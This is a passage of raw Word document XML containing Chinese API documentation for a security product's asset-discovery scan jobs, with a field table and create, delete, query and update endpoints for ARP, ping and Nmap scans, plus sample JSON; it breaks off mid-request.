            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="334F137D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>macAddr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BAB80E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D7CACE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被发现主机的mac地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="741EC403" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ED4157E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ipAddr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="594987B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74E79A7E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被发现主机的ip地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3214CC80" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B52AB30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>deviceType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D7E3345" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D81A7F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被发现主机的设备类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3C1BEBB7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62F61F51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osFamily</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="171C57F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35669982" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被发现主机的操作系统类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="62BDBFB1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="162E9D01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1549FAD2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5227FA64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行发现任务的主机的agent id,16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4FFC10D1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="246FE2B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>discoveryIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7358374D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A4E7C1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行发现任务的主机的ip地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="285C5ABA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="141E092E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F52E8B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AB6F832" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行发现任务的主机的agent状态 0-在线；1-离线；2挂起；3-删除</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="03101998" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A114CC3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>scanMethods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04BAC1B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BA63A1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>发现该主机的扫描方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="22D0D9AD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BB29265" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>firstDiscoverTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CA6ECAF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AD2C4B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>第一次发现时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="75C47283" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="413B82BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>lastDiscoverTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23134BAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="364AFC79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>最近一次发现时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5A08273B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C6A1383" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C7B4F3F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="019C08BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行发现任务的主机的操作系统 1-linux；2-windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05D5E3D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="207" w:name="扫描任务"/>
      <w:bookmarkEnd w:id="206"/>
      <w:r>
        <w:t>扫描任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79929980" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="208" w:name="创建扫描任务"/>
      <w:r>
        <w:t>创建扫描任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0817C102" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125426CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assetdiscovery/job/create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41611502" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446FD0B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "name": "assetdiscovery_job_name",    // 自定义扫描任务名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "kind": 0,    // 任务发起主机类型 0：自定义主机；1：自定义业务组 2：全部主机（注意：只能选择 Linux 的主机作为扫描发起主机，建议选择两台及以上主机扫描整个网段）</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "values": [    // 当kind=0时，valus传agentid；当kind=1时，valus传groupid</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"5fcf47bf4891559a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"5f8e5559b767de2f"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cronExpression": "0 15 * * *",    // 定时扫描cron表达式</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "osDetection": true,    // 是否获取操作系统 true/false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ipList": [],           // 扫描网段（选填）</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "advanceConfigs": [     // 扫描方式设置，以下三种扫描方式至少选择一个</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "scanType": 0    // ARP缓存方式扫描</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "scanType": 1    // Ping方式扫描</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "scanType": 2,        // Nmap方式扫描，以下两种协议至少选择一个</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "tcpPort": "80",      // tcp协议扫描端口</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "udpPort": "40125"    //udp协议扫描端口</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "maxParallelism": 50,    // 并发扫描最大数量（请填写整数）</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "maxRate": 50,         // 每秒最大发包数（请填写整数）</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "taskInterval": 5.0    // 服务器下发任务间隔，不超过600（单位：秒，精确值小数点后一位）</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A68793" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FABC161" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5fdacbf3edc90d7a292ae9a5"    // 任务id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B26A22B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54"/>
    <w:p w14:paraId="74283617" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="209" w:name="删除扫描任务"/>
      <w:bookmarkEnd w:id="208"/>
      <w:r>
        <w:t>删除扫描任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B014D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1BE841" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assetdiscovery/job/delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA9B3EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556821F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "specId": "5fdacbf3edc90d7a292ae9a5"    // 任务id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EB507B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7B330F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5fdacbf3edc90d7a292ae9a5"    // 被删除的任务id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D629F03" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54"/>
    <w:p w14:paraId="4B7B2AC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="210" w:name="任务配置详情"/>
      <w:bookmarkEnd w:id="209"/>
      <w:r>
        <w:t>任务配置详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2400E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3343B978" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assetdiscovery/job/find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F0DBB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502E904E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "specId": "5fdaca26398e682e95d9d3f4"    // 任务id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2562E438" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD9F0B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5fdaca26398e682e95d9d3f4",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "name": "my_discovery_job",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "kind": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "values": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "osType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cronExpression": "20 20 * * *",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "osDetection": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "ipList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "advanceConfigs": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "scanType": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "tcpPort": "80",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "udpPort": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "scanType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "tcpPort": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "udpPort": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "maxParallelism": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "maxRate": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "taskInterval": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cronTaskId": 21</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF3808F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54"/>
    <w:p w14:paraId="7497A1A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="211" w:name="修改扫描任务配置"/>
      <w:bookmarkEnd w:id="210"/>
      <w:r>
        <w:t>修改扫描任务配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782143E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F360234" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assetdiscovery/job/update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FF5B48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705DC38D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 先通过 11.3 的 find 接口，查出任务的配置详情，再修改其中某些配置项后提交update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5823F5BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "specId": "5fdaca26398e682e95d9d3f4",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "name": "my_discovery_job_update",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "kind": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "values": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "osDetection": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "advanceConfigs": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "scanType": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "tcpPort": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "udpPort": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "scanType": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
